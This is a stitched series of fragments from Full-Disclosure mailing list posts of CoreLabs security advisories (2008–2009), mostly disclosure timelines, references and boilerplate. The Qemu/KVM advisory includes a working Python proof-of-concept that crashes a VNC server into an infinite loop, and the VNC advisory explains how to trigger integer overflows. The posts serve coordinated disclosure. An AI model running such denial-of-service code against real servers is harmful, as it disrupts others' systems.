fix for this bug. The vendor will not be ready to go public with this fix tomorrow. . 2009-05-05: Core responds that it is possible to postpone the publication of the advisory, but asks Sun engineering team for an estimated date to reach the final release of the fix as soon as possible. . 2009-05-08: Sun engineering team informs they are still experiencing some delays with the final stages of this release process and asks to delay the publication of the advisory. . 2009-05-18: Sun engineering team confirms that they have resolved the outstanding issues related to this vulnerability and they expect to be ready to publish the fixes on Wednesday 20th May. . 2009-05-18: Core re-schedules the advisory publication date to 20th May. . 2009-05-20: The advisory CORE-2009-0109 is published. 10. *References* [1] http://www.sun.com/software/products/calendar_srvr/comms_express/index.xml [2] HTML Code Injection and Cross-Site Scripting http://www.technicalinfo.net/papers/CSS.html. [3] The Cross-Site Scripting FAQ (XSS) http://www.cgisecurity.com/articles/xss-faq.shtml [4] How to prevent Cross-Site Scripting Security Issues http://support.microsoft.com/default.aspx?scid=KB;en-us;q252985 [5] How to review ASP Code for CSSI Vulnerability http://support.microsoft.com/default.aspx?scid=kb;EN-US;253119 [6] How to review Visual InterDev Generated Code for CSSI Vulnerability http://support.microsoft.com/default.aspx?scid=kb;EN-US;253120 [7] HTTP Response Splitting vulnerability in Sun Delegated Administrator - - http://www.coresecurity.com/content/sun-delegated-administrator 11. *About CoreLabs* CoreLabs, the research center of Core Security Technologies, is charged with anticipating the future needs and requirements for information security technologies. We conduct our research in several important areas of computer security including system vulnerabilities, cyber attack planning and simulation, source code auditing, and cryptography. Our results include problem formalization, identification of vulnerabilities, novel solutions and prototypes for new technologies. CoreLabs regularly publishes security advisories, technical papers, project information and shared software tools for public use at: http://www.coresecurity.com/corelabs. 12. *About Core Security Technologies* Core Security Technologies develops strategic solutions that help security-conscious organizations worldwide develop and maintain a proactive process for securing their networks. The company's flagship product, CORE IMPACT, is the most comprehensive product for performing enterprise security assurance testing. CORE IMPACT evaluates network, endpoint and end-user vulnerabilities and identifies what resources are exposed. It enables organizations to determine if current security investments are detecting and preventing attacks. Core Security Technologies augments its leading technology solution with world-class security consulting services, including penetration testing and software security auditing. Based in Boston, MA and Buenos Aires, Argentina, Core Security Technologies can be reached at 617-399-6980 or on the Web at http://www.coresecurity.com. 13. *Disclaimer* The contents of this advisory are copyright (c) 2009 Core Security Technologies and (c) 2009 CoreLabs, and may be distributed freely provided that no fee is charged for this distribution and proper credit is given. 14. *PGP/GPG Keys* This advisory has been signed with the GPG key of Core Security Technologies advisories team, which is available for download at http://www.coresecurity.com/files/attachments/core_security_advisories.asc. -BEGIN PGP SIGNATURE- Version: GnuPG v1.4.7 (MingW32) Comment: Using GnuPG with Mozilla - http://enigmail.mozdev.org iD8DBQFKFEWVyNibggitWa0RAqSuAKCRr0zxGIvhYRVD92VLI7W1pJezQwCfVvSO SNbJmS6GjYkZPyIfI3+JIpw= =wOZe -END PGP SIGNATURE- ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] [Advisories] CORE-2009-0114 - HTTP Response Splitting vulnerability in Sun Delegated Administrator
Sergio 'shadown' Alvarez wrote: > Hi, > > In the last CORE's advisories I've seen the following credits: > >> 7. *Credits* >> >> This vulnerability was discovered by the SCS team [3] from Core >> Security >> Technologies. > > > Does this "SCS team"'s guy have a name ? > Even in a football match 'the team' wins the match, but the GOALS are > made by somebody that deserves the credits. > Yes, they have names and they did not want them to appear in the advisory. Thank you for your continued interest in crediting vulnerability discoverers for their findings and your insightful comments about sports. -ivan ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] CORE-2009-0114 - HTTP Response Splitting vulnerability in Sun Delegated Administrator
epaper_httpresponse.pdf. [2] http://www.webappsec.org/projects/threat/classes/http_response_splitting.shtml. [3] Core Security Consulting Services - http://www.coresecurity.com/content/services-overview-core-security-consulting-services. [4] Multiple vulnerabilities in Sun Calendar Express Web Server - http://www.coresecurity.com/content/sun-calendar-express. 11. *About CoreLabs* CoreLabs, the research center of Core Security Technologies, is charged with anticipating the future needs and requirements for information security technologies. We conduct our research in several important areas of computer security including system vulnerabilities, cyber attack planning and simulation, source code auditing, and cryptography. Our results include problem formalization, identification of vulnerabilities, novel solutions and prototypes for new technologies. CoreLabs regularly publishes security advisories, technical papers, project information and shared software tools for public use at: http://www.coresecurity.com/corelabs. 12. *About Core Security Technologies* Core Security Technologies develops strategic solutions that help security-conscious organizations worldwide develop and maintain a proactive process for securing their networks. The company's flagship product, CORE IMPACT, is the most comprehensive product for performing enterprise security assurance testing. CORE IMPACT evaluates network, endpoint and end-user vulnerabilities and identifies what resources are exposed. It enables organizations to determine if current security investments are detecting and preventing attacks. Core Security Technologies augments its leading technology solution with world-class security consulting services, including penetration testing and software security auditing. Based in Boston, MA and Buenos Aires, Argentina, Core Security Technologies can be reached at 617-399-6980 or on the Web at http://www.coresecurity.com. 13. *Disclaimer* The contents of this advisory are copyright (c) 2009 Core Security Technologies and (c) 2009 CoreLabs, and may be distributed freely provided that no fee is charged for this distribution and proper credit is given. 14. *PGP/GPG Keys* This advisory has been signed with the GPG key of Core Security Technologies advisories team, which is available for download at http://www.coresecurity.com/files/attachments/core_security_advisories.asc. -BEGIN PGP SIGNATURE- Version: GnuPG v1.4.7 (MingW32) Comment: Using GnuPG with Mozilla - http://enigmail.mozdev.org iD8DBQFJ7hRxyNibggitWa0RAol4AKCOjfL+KHTrwpUC6oW8QCtpj15b5QCgrajW Naq8DYWEmQtTtrsAx/DeO1U= =3bt/ -END PGP SIGNATURE- ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] CORE-2009-0108: Multiple vulnerabilities in Sun Calendar Express Web Server
: The advisory CORE-2009-0108 is published. 9. *References* [1] http://www.sun.com/software/products/calendar_srvr/ [2] HTML Code Injection and Cross-Site Scripting http://www.technicalinfo.net/papers/CSS.html. [3] The Cross-Site Scripting FAQ (XSS) http://www.cgisecurity.com/articles/xss-faq.shtml [4] How to prevent Cross-Site Scripting Security Issues http://support.microsoft.com/default.aspx?scid=KB;en-us;q252985 [5] How to review ASP Code for CSSI Vulnerability http://support.microsoft.com/default.aspx?scid=kb;EN-US;253119 [6] How to review Visual InterDev Generated Code for CSSI Vulnerability http://support.microsoft.com/default.aspx?scid=kb;EN-US;253120 10. *About CoreLabs* CoreLabs, the research center of Core Security Technologies, is charged with anticipating the future needs and requirements for information security technologies. We conduct our research in several important areas of computer security including system vulnerabilities, cyber attack planning and simulation, source code auditing, and cryptography. Our results include problem formalization, identification of vulnerabilities, novel solutions and prototypes for new technologies. CoreLabs regularly publishes security advisories, technical papers, project information and shared software tools for public use at: http://www.coresecurity.com/corelabs. 11. *About Core Security Technologies* Core Security Technologies develops strategic solutions that help security-conscious organizations worldwide develop and maintain a proactive process for securing their networks. The company's flagship product, CORE IMPACT, is the most comprehensive product for performing enterprise security assurance testing. CORE IMPACT evaluates network, endpoint and end-user vulnerabilities and identifies what resources are exposed. It enables organizations to determine if current security investments are detecting and preventing attacks. Core Security Technologies augments its leading technology solution with world-class security consulting services, including penetration testing and software security auditing. Based in Boston, MA and Buenos Aires, Argentina, Core Security Technologies can be reached at 617-399-6980 or on the Web at http://www.coresecurity.com. 12. *Disclaimer* The contents of this advisory are copyright (c) 2009 Core Security Technologies and (c) 2009 CoreLabs, and may be distributed freely provided that no fee is charged for this distribution and proper credit is given. 13. *PGP/GPG Keys* This advisory has been signed with the GPG key of Core Security Technologies advisories team, which is available for download at http://www.coresecurity.com/files/attachments/core_security_advisories.asc. -BEGIN PGP SIGNATURE- Version: GnuPG v1.4.8 (MingW32) Comment: Using GnuPG with Mozilla - http://enigmail.mozdev.org iEYEARECAAYFAknSdqcACgkQyNibggitWa0uJACdGnW7RfFSY8hVoOPaG8mQcF4b r4IAn15Z4MCrAj2uO9XKLYXBUuYHWNTv =xGtf -END PGP SIGNATURE- ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] CORE-2009-0122: HP OpenView Buffer Overflows
within HP, and that they will publish their security bulletin on March 24. Vendor asks Core not to publish the patch location because that should be published on their security bulletin. . 2009-03-17: Core re-schedules advisory CORE-2009-0122 publication to March 24 and asks the vendor the URL of their security bulletin when available. . 2009-03-17: Core asks the vendor to reschedule publication to March 23, because March 24 is a working holiday in Argentina, where Core's research and development center is located. . 2009-03-17: Vendor confirms March 23 as the new publication date. . 2009-03-23: Vendor publishes the hot fix. . 2009-03-23: Core publishes advisory CORE-2009-0122. 9. *References* [1] Secunia Research 07/01/2009 http://secunia.com/secunia_research/2008-13/ [2] HP OpenView Network Node Manager Toolbar.exe CGI buffer overflow http://www.saintcorporation.com/cgi-bin/exploit_info/openview_nnm_toolbar [3] CVE-2008-0067 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-0067 [4] HP advisory (HPSBMA02400 SSRT080144) https://www13.itrc.hp.com/service/cki/docDisplay.do?docId=emr_na-c01646081 [5] HP security bulletin http://h2.www2.hp.com/bizsupport/TechSupport/Document.jsp?objectID=c01696729 10. *About CoreLabs* CoreLabs, the research center of Core Security Technologies, is charged with anticipating the future needs and requirements for information security technologies. We conduct our research in several important areas of computer security including system vulnerabilities, cyber attack planning and simulation, source code auditing, and cryptography. Our results include problem formalization, identification of vulnerabilities, novel solutions and prototypes for new technologies. CoreLabs regularly publishes security advisories, technical papers, project information and shared software tools for public use at: http://www.coresecurity.com/corelabs. 11. *About Core Security Technologies* Core Security Technologies develops strategic solutions that help security-conscious organizations worldwide develop and maintain a proactive process for securing their networks. The company's flagship product, CORE IMPACT, is the most comprehensive product for performing enterprise security assurance testing. CORE IMPACT evaluates network, endpoint and end-user vulnerabilities and identifies what resources are exposed. It enables organizations to determine if current security investments are detecting and preventing attacks. Core Security Technologies augments its leading technology solution with world-class security consulting services, including penetration testing and software security auditing. Based in Boston, MA and Buenos Aires, Argentina, Core Security Technologies can be reached at 617-399-6980 or on the Web at http://www.coresecurity.com. 12. *Disclaimer* The contents of this advisory are copyright (c) 2009 Core Security Technologies and (c) 2009 CoreLabs, and may be distributed freely provided that no fee is charged for this distribution and proper credit is given. 13. *PGP/GPG Keys* This advisory has been signed with the GPG key of Core Security Technologies advisories team, which is available for download at http://www.coresecurity.com/files/attachments/core_security_advisories.asc. -BEGIN PGP SIGNATURE- Version: GnuPG v1.4.8 (MingW32) Comment: Using GnuPG with Mozilla - http://enigmail.mozdev.org iEYEARECAAYFAknHys0ACgkQyNibggitWa1uoACfWfSGTJjQCfGhYOxwBVbUTAEo SuAAnAqFoSVhM7q6IcRdqyw6e8LgSFzM =DVLu -END PGP SIGNATURE- ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] Foxit Reader Multiple Vulnerabilities (CORE-2009-0218)
009/03/remote-code-execution-in-pdf-still.html [4] Authorization bypass http://www.coresecurity.com/files/attachments/CORE-2009-0218-PoC-authorization-bypass.pdf [5] Buffer overflow http://www.coresecurity.com/files/attachments/CORE-2009-0218-PoC-BOF.pdf 11. *About CoreLabs* CoreLabs, the research center of Core Security Technologies, is charged with anticipating the future needs and requirements for information security technologies. We conduct our research in several important areas of computer security including system vulnerabilities, cyber attack planning and simulation, source code auditing, and cryptography. Our results include problem formalization, identification of vulnerabilities, novel solutions and prototypes for new technologies. CoreLabs regularly publishes security advisories, technical papers, project information and shared software tools for public use at: http://www.coresecurity.com/corelabs. 12. *About Core Security Technologies* Core Security Technologies develops strategic solutions that help security-conscious organizations worldwide develop and maintain a proactive process for securing their networks. The company's flagship product, CORE IMPACT, is the most comprehensive product for performing enterprise security assurance testing. CORE IMPACT evaluates network, endpoint and end-user vulnerabilities and identifies what resources are exposed. It enables organizations to determine if current security investments are detecting and preventing attacks. Core Security Technologies augments its leading technology solution with world-class security consulting services, including penetration testing and software security auditing. Based in Boston, MA and Buenos Aires, Argentina, Core Security Technologies can be reached at 617-399-6980 or on the Web at http://www.coresecurity.com. 13. *Disclaimer* The contents of this advisory are copyright (c) 2009 Core Security Technologies and (c) 2009 CoreLabs, and may be distributed freely provided that no fee is charged for this distribution and proper credit is given. 14. *PGP/GPG Keys* This advisory has been signed with the GPG key of Core Security Technologies advisories team, which is available for download at http://www.coresecurity.com/files/attachments/core_security_advisories.asc. -BEGIN PGP SIGNATURE- Version: GnuPG v1.4.6 (MingW32) Comment: Using GnuPG with Mozilla - http://enigmail.mozdev.org iD8DBQFJtXCwyNibggitWa0RAu8GAJ45qFT1lQnIKHD7TZEKcvKkSWtRegCfRHun pTg5BtPWfDaeHh/o0Jc//Cw= =M175 -END PGP SIGNATURE- ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] CORE-2008-1009 - VNC Multiple Integer Overflows
_socket->SendExact(str, strlen(str)))
364:return FALSE;
365:
366:return TRUE;
367: }
...
- ---/
modifying the line 360, a crafted length like 0x triggers an
exception in the following functions:
. In the case of UltraVNC, in 'ClientConnection::Authenticate()'
. In the case of TightVNC, in 'ClientConnection::ReadFailureReason()'
To trigger the bug in the function 'ClientConnection::CheckBufferSize'
located in the file 'ClientConnection.cpp' (both vendors):
/---
(vncClient.cpp)
1848: void vncClient::UpdateClipText(LPSTR text)
1849: {
..
..
1858: rfbServerCutTextMsg message;
1860: message.length = Swap32IfLE(strlen(text));
1861: if (!SendRFBMsg(rfbServerCutText, (BYTE *) &message, sizeof(message)))
1862: {
1863: Kill();
1864: return;
1865: }
1866: if (!m_socket->SendQueued(text, strlen(text)))
1867: {
1868: Kill();
1869: return;
1870: }
1871: }
..
- ---/
In line 1860 the 'message.length' structure must be modified to some
evil value like 0x.
9. *Report Timeline*
. 2009-01-09:
Core notifies the TightVNC team of the vulnerability.
. 2009-01-09:
Core notifies the UltraVNC team of the vulnerability.
. 2009-01-10:
The UltraVNC team asks Core for a technical description of the
vulnerability.
. 2009-01-12:
Core notifies the TightVNC team of the vulnerability. The previous email
sent by Core was rejected by the vendor email service.
. 2009-01-12:
Technical details sent to UltraVNC team by Core.
. 2009-01-14:
The TightVNC team asks Core for a technical description of the
vulnerability.
. 2009-01-14:
Technical details sent to TightVNC team by Core.
. 2009-01-21:
TightVNC team notifies Core that a fix has been produced, but the
release of the fixed version (TightVNC 1.3.10) will be available early
February. TightVNC team releases the fix for its SVN users [5].
. 2009-01-26:
Core asks TightVNC if the fixed version will be available on
02-Feb-2009. No reply received.
. 2009-01-26:
Core asks UltraVNC team if a fixed version is available.
. 2009-01-26:
UltraVNC team notifies Core that a fixed version will probably be
available on Feb 1st 2009.
. 2009-01-30:
Core notifies TightVNC and UltraVNC teams the advisory will be released
on Feb 3rd 2009, given that the vulnerability was already made public [5].
. 2009-02-02:
UltraVNC team notifies Core that a fix has been produced and will be
available to the users on Tuesday, Feb 3rd.
. 2009-02-02:
TightVNC team notifies Core that a patched version will be available to
the users on Tuesday, Feb 10th.
. 2009-02-03:
CORE-2008-1009 advisory is published.
10. *References*
[1] http://www.uvnc.com.
[2] http://www.tightvnc.com.
[3] http://www.realvnc.com.
[4] UltraVNC binary patches:
http://support1.uvnc.com/download/vncviewer_1054_w32.zip and
http://support1.uvnc.com/download/vncviewer_1054_X64.zip.
[5]
http://vnc-tight.svn.sourceforge.net/viewvc/vnc-tight?view=rev&revision=3564.
11. *About CoreLabs*
CoreLabs, the research center of Core Security Technologies, is charged
with anticipating the future needs and requirements for information
security technologies. We conduct our research in several important
areas of computer security including system vulnerabilities, cyber
attack planning and simulation, source code auditing, and cryptography.
Our results include problem formalization, identification of
vulnerabilities, novel solutions and prototypes for new technologies.
CoreLabs regularly publishes security advisories, technical papers,
project information and shared software tools for public use at:
http://www.coresecurity.com/corelabs.
12. *About Core Security Technologies*
Core Security Technologies develops strategic solutions that help
security-conscious organizations worldwide develop and maintain a
proactive process for securing their networks. The company's flagship
product, CORE IMPACT, is the most comprehensive product for performing
enterprise security assurance testing. CORE IMPACT evaluates network,
endpoint and end-user vulnerabilities and identifies what resources are
exposed. It enables organizations to determine if current security
investments are detecting and preventing attacks. Core Security
Technologies augments its leading technology solution with world-class
security consulting services, including penetration testing and software
security auditing. Based in Boston, MA and Buenos Aires, Argentina, Core
Security Technologies can be reached at 617-399-6980 or on the Web at
http://www.coresecurity.com.
13. *Disclaimer*
The contents of this advisory are copyright (c) 2009 Core Security
Technologies and (c) 2009 CoreLabs, and may be distributed freely
provided that no fee is charged for this distribution and proper credit
is given.
14. *PGP/GPG Keys*
This advisory has been signed with the GPG key of Core Security
Technologies advisories team, wh
[Full-disclosure] CORE-2008-1211: Amaya web editor XML and HTML parser vulnerabilities
exhaustive enumeration of the stack-based buffer overflows that can be found in Amaya. Remarkably, in the unpatched version, files 'html2thot.c' and 'xml2thot.c' contain many general purpose buffers defined as /--- char msgBuffer[MaxMsgLength] - ---/ and the length of buffers is generally not checked in the functions using them (i.e. 'strcpy', 'sprintf', etcetera). 9. *Report Timeline* . 2008-12-18: Core notifies the vendor of the vulnerability. . 2008-12-19: Vendor requests information about versions tested. . 2008-12-19: Core notifies the vendor that the vulnerability was tested on Amaya 11.0 and 10.0 (Windows XP). . 2008-12-29: Core offers to send the advisory draft to the vendor and offers to negotiate the publication date. . 2009-01-08: Core sends the advisory draft to the vendor. . 2009-01-09: Vendor informs that the bugs were fixed in the CVS version and will be included in version 11.1 by the end of January. . 2009-01-12: Core requests a more precise date. . 2009-01-14: Vendor suggest to publish the advisory on January 28th at the same time of release of Amaya 11.1. . 2009-01-14: Core confirms the vendor that advisory CORE-2008-1211 will be published on January 28th. . 2009-01-28: Core publishes advisory CORE-2008-1211. 10. *References* [1] Amaya Homepage http://www.w3.org/Amaya 11. *About CoreLabs* CoreLabs, the research center of Core Security Technologies, is charged with anticipating the future needs and requirements for information security technologies. We conduct our research in several important areas of computer security including system vulnerabilities, cyber attack planning and simulation, source code auditing, and cryptography. Our results include problem formalization, identification of vulnerabilities, novel solutions and prototypes for new technologies. CoreLabs regularly publishes security advisories, technical papers, project information and shared software tools for public use at: http://www.coresecurity.com/corelabs. 12. *About Core Security Technologies* Core Security Technologies develops strategic solutions that help security-conscious organizations worldwide develop and maintain a proactive process for securing their networks. The company's flagship product, CORE IMPACT, is the most comprehensive product for performing enterprise security assurance testing. CORE IMPACT evaluates network, endpoint and end-user vulnerabilities and identifies what resources are exposed. It enables organizations to determine if current security investments are detecting and preventing attacks. Core Security Technologies augments its leading technology solution with world-class security consulting services, including penetration testing and software security auditing. Based in Boston, MA and Buenos Aires, Argentina, Core Security Technologies can be reached at 617-399-6980 or on the Web at http://www.coresecurity.com. 13. *Disclaimer* The contents of this advisory are copyright (c) 2009 Core Security Technologies and (c) 2009 CoreLabs, and may be distributed freely provided that no fee is charged for this distribution and proper credit is given. 14. *PGP/GPG Keys* This advisory has been signed with the GPG key of Core Security Technologies advisories team, which is available for download at http://www.coresecurity.com/files/attachments/core_security_advisories.asc. -BEGIN PGP SIGNATURE- Version: GnuPG v1.4.6 (MingW32) Comment: Using GnuPG with Mozilla - http://enigmail.mozdev.org iD8DBQFJgKLpyNibggitWa0RAmNOAKCT1Mxhe8VysinqBnwAtbuuhAaedgCeOWL6 DWuJPZIBvcK5lINLAJ2ylR8= =X9Dw -END PGP SIGNATURE- ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] CORE-2008-1128: Openfire multiple vulnerabilities
planning and simulation, source code auditing, and cryptography. Our results include problem formalization, identification of vulnerabilities, novel solutions and prototypes for new technologies. CoreLabs regularly publishes security advisories, technical papers, project information and shared software tools for public use at: http://www.coresecurity.com/corelabs. 12. *About Core Security Technologies* Core Security Technologies develops strategic solutions that help security-conscious organizations worldwide develop and maintain a proactive process for securing their networks. The company's flagship product, CORE IMPACT, is the most comprehensive product for performing enterprise security assurance testing. CORE IMPACT evaluates network, endpoint and end-user vulnerabilities and identifies what resources are exposed. It enables organizations to determine if current security investments are detecting and preventing attacks. Core Security Technologies augments its leading technology solution with world-class security consulting services, including penetration testing and software security auditing. Based in Boston, MA and Buenos Aires, Argentina, Core Security Technologies can be reached at 617-399-6980 or on the Web at http://www.coresecurity.com. 13. *Disclaimer* The contents of this advisory are copyright (c) 2009 Core Security Technologies and (c) 2009 CoreLabs, and may be distributed freely provided that no fee is charged for this distribution and proper credit is given. 14. *PGP/GPG Keys* This advisory has been signed with the GPG key of Core Security Technologies advisories team, which is available for download at http://www.coresecurity.com/files/attachments/core_security_advisories.asc. -BEGIN PGP SIGNATURE- Version: GnuPG v1.4.8 (MingW32) Comment: Using GnuPG with Mozilla - http://enigmail.mozdev.org iEYEARECAAYFAklmORMACgkQyNibggitWa35jgCbByp8LF4bUePcXG2YK1KEiV9G GYcAn3kpUOvc0f8N1TbJJufmRTCkgqxI =xHTF -END PGP SIGNATURE- ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] CORE-2008-1210: Qemu and KVM VNC server remote DoS
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1
Core Security Technologies - CoreLabs Advisory
http://www.coresecurity.com/corelabs/
Qemu and KVM VNC server remote DoS
1. *Advisory Information*
Title: Qemu and KVM VNC server remote DoS
Advisory ID: CORE-2008-1210
Advisory URL: http://www.coresecurity.com/content/vnc-remote-dos
Date published: 2009-12-22
Date of last update: 2008-12-19
Vendors contacted: Qemu and KVM teams
Release mode: Coordinated release
2. *Vulnerability Information*
Class: Denial of service (DoS)
Remotely Exploitable: Yes
Locally Exploitable: No
Bugtraq ID: 32910
CVE Name: N/A
3. *Vulnerability Description*
The VNC server of Qemu and KVM virtualization solutions are vulnerable
to a remote DoS, when specially crafted packets are received by the host
VNC server causing an infinite loop.
Successful exploitation causes the host server to enter an infinite loop
and cease to function. The vulnerability can be triggered remotely by
external hosts or virtualized guests. No special privileges are required
to perform the Denial of Service.
4. *Vulnerable packages*
. Qemu 0.9.1 and older
. kvm-79 and older
5. *Vendor Information, Solutions and Workarounds*
Qemu and KVM teams will release patches that fix this vulnerability.
6. *Credits*
This vulnerability was discovered and researched by Alfredo Ortega from
Core Security Technologies.
7. *Technical Description / Proof of Concept Code*
The function 'protocol_client_msg()' in the file 'vnc.c' ('qemu/vnc.c'
in kvm-66) is in charge of processing incoming VNC low-level messages. A
listing of the vulnerable source follows:
/---
vnc.c
1185: static int protocol_client_msg(VncState *vs, uint8_t *data, size_t
len)
1186: {
1187: int i;
1188: uint16_t limit;
1189:
1190: switch (data[0]) {
...
1201: case 2:
1202: if (len == 1)
1203: return 4;
1204:
1205: if (len == 4)
1206: return 4 + (read_u16(data, 2) * 4);
- ---/
When the VNC server receives a message consisting of '\x02\x00\x00\x00'
the 'read_u16()' function will return zero, and an infinite loop will be
triggered, because this function will be called with the len parameter
always equal to 4.
7.1. *Proof of Concept*
The following python script implements a basic VNC client that triggers
the vulnerability on the VNC server.
*NOTE:* Some VNC servers like KVM, don't bind to 0.0.0.0 by default, but
the server can still be reached from a guest VM when no VNC client is
attached.
/---
Example:
Launch vulnerable qemu:
~$qemu ./test.img - -vnc 0.0.0.0:0
Launch attack:
~$python qemu-kvm-DoS.py localhost 5900
- ---/
/---
##
## vnc remote DoS
##
import socket
import time
import struct
import sys
if len(sys.argv)<3:
print "Usage: %s host port" % sys.argv[0]
exit(0)
host = sys.argv[1] # "127.0.0.1" # debian 4
port = int(sys.argv[2]) # 5900
s =socket.socket(socket.AF_INET,socket.SOCK_STREAM)
s.connect((host,port))
# rec-send versions
srvversion = s.recv(100)
cliversion=srvversion
s.send(cliversion)
print "Server version: %s" % srvversion
#Security types
sec=s.recv(100)
print "Number of security types: %d" % ord(sec[0])
s.send(sec[1])
# Authentication result
auth=s.recv(100)
if auth=="\x00\x00\x00\x00":
print "Auth ok."
# Share desktop flag: no
s.send("\x00")
# Server framebuffer parameters:
framebuf=s.recv(100)
# Trigger the bug
s.send("\x02\x00\x00\x00\x00\xff"+struct.pack("http://www.coresecurity.com/corelabs.
10. *About Core Security Technologies*
Core Security Technologies develops strategic solutions that help
security-conscious organizations worldwide develop and maintain a
proactive process for securing their networks. The company's flagship
product, CORE IMPACT, is the most comprehensive product for performing
enterprise security assurance testing. CORE IMPACT evaluates network,
endpoint and end-user vulnerabilities and identifies what resources are
exposed. It enables organizations to determine if current security
investments are detecting and preventing attacks. Core Security
Technologies augments its leading technology solution with world-class
security consulting services, including penetration testing and software
security auditing. Based in Boston, MA and Buenos Aires, Argentina, Core
Security Technologies can be reached at 617-399-6980 or on the Web at
http://www.coresecurity.com.
11. *Disclaimer*
The contents of this advisory are copyright (c) 2008 Core Security
Technologies and (c) 2008 CoreLabs, and may be distributed freely
provided that no fee is charged for this distribution and proper credit
is given.
12. *PGP/GPG Keys*
This advisory has been signed with the GPG key of Core Security
Technologies advi
[Full-disclosure] CORE-2008-0228: Microsoft Word Malformed FIB Arbitrary Free Vulnerability
Core Security Technologies, is charged with anticipating the future needs and requirements for information security technologies. We conduct our research in several important areas of computer security including system vulnerabilities, cyber attack planning and simulation, source code auditing, and cryptography. Our results include problem formalization, identification of vulnerabilities, novel solutions and prototypes for new technologies. CoreLabs regularly publishes security advisories, technical papers, project information and shared software tools for public use at: http://www.coresecurity.com/corelabs. 12. *About Core Security Technologies* Core Security Technologies develops strategic solutions that help security-conscious organizations worldwide develop and maintain a proactive process for securing their networks. The company's flagship product, CORE IMPACT, is the most comprehensive product for performing enterprise security assurance testing. CORE IMPACT evaluates network, endpoint and end-user vulnerabilities and identifies what resources are exposed. It enables organizations to determine if current security investments are detecting and preventing attacks. Core Security Technologies augments its leading technology solution with world-class security consulting services, including penetration testing and software security auditing. Based in Boston, MA and Buenos Aires, Argentina, Core Security Technologies can be reached at 617-399-6980 or on the Web at http://www.coresecurity.com. 13. *Disclaimer* The contents of this advisory are copyright (c) 2008 Core Security Technologies and (c) 2008 CoreLabs, and may be distributed freely provided that no fee is charged for this distribution and proper credit is given. 14. *PGP/GPG Keys* This advisory has been signed with the GPG key of Core Security Technologies advisories team, which is available for download at http://www.coresecurity.com/files/attachments/core_security_advisories.asc. -BEGIN PGP SIGNATURE- Version: GnuPG v1.4.8 (MingW32) Comment: Using GnuPG with Mozilla - http://enigmail.mozdev.org iEYEARECAAYFAkk/32wACgkQyNibggitWa1twACfR4nlubY9KyYIN7ubBUnXlnm6 QgEAnRl3fbRhADlci+pJwDQGjrtj2bxs =hR/7 -END PGP SIGNATURE- ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] CORE-2008-1127 - Vinagre show_error() format string vulnerability
at: http://www.coresecurity.com/corelabs. 12. *About Core Security Technologies* Core Security Technologies develops strategic solutions that help security-conscious organizations worldwide develop and maintain a proactive process for securing their networks. The company's flagship product, CORE IMPACT, is the most comprehensive product for performing enterprise security assurance testing. CORE IMPACT evaluates network, endpoint and end-user vulnerabilities and identifies what resources are exposed. It enables organizations to determine if current security investments are detecting and preventing attacks. Core Security Technologies augments its leading technology solution with world-class security consulting services, including penetration testing and software security auditing. Based in Boston, MA and Buenos Aires, Argentina, Core Security Technologies can be reached at 617-399-6980 or on the Web at http://www.coresecurity.com. 13. *Disclaimer* The contents of this advisory are copyright (c) 2008 Core Security Technologies and (c) 2008 CoreLabs, and may be distributed freely provided that no fee is charged for this distribution and proper credit is given. 14. *PGP/GPG Keys* This advisory has been signed with the GPG key of Core Security Technologies advisories team, which is available for download at http://www.coresecurity.com/files/attachments/core_security_advisories.asc. -BEGIN PGP SIGNATURE- Version: GnuPG v1.4.7 (MingW32) Comment: Using GnuPG with Mozilla - http://enigmail.mozdev.org iD8DBQFJPsvQyNibggitWa0RAoZHAJ9RQxrboOG+3oWfK4qH8pMoZEELHgCeOyVJ bVIpD2b1TEob7GKuEfmBAYs= =31Hp -END PGP SIGNATURE- ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] CORE-2008-0526: Adobe Reader Javascript Printf Buffer Overflow
technology solution with world-class security consulting services, including penetration testing and software security auditing. Based in Boston, MA and Buenos Aires, Argentina, Core Security Technologies can be reached at 617-399-6980 or on the Web at http://www.coresecurity.com. 13. *Disclaimer* The contents of this advisory are copyright (c) 2008 Core Security Technologies and (c) 2008 CoreLabs, and may be distributed freely provided that no fee is charged for this distribution and proper credit is given. 14. *PGP/GPG Keys* This advisory has been signed with the GPG key of Core Security Technologies advisories team, which is available for download at http://www.coresecurity.com/files/attachments/core_security_advisories.asc. -BEGIN PGP SIGNATURE- Version: GnuPG v1.4.8 (MingW32) Comment: Using GnuPG with Mozilla - http://enigmail.mozdev.org iEYEARECAAYFAkkQc60ACgkQyNibggitWa2XmgCfQuemfRRpWnUOqIbJyR/Ioj4c YjwAn0A6hNouqD4CJI8hmRCnMPvENPRP =WCMf -END PGP SIGNATURE- ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] CORE-2008-1010: VLC media player XSPF Memory Corruption
sassembled vulnerable code:
/---
70246981 . 39C2 CMP EDX,EAX ;
i_identifier < i_tracklist_entries?
70246983 . 7D 29 JGE SHORT libplayl.702469AE
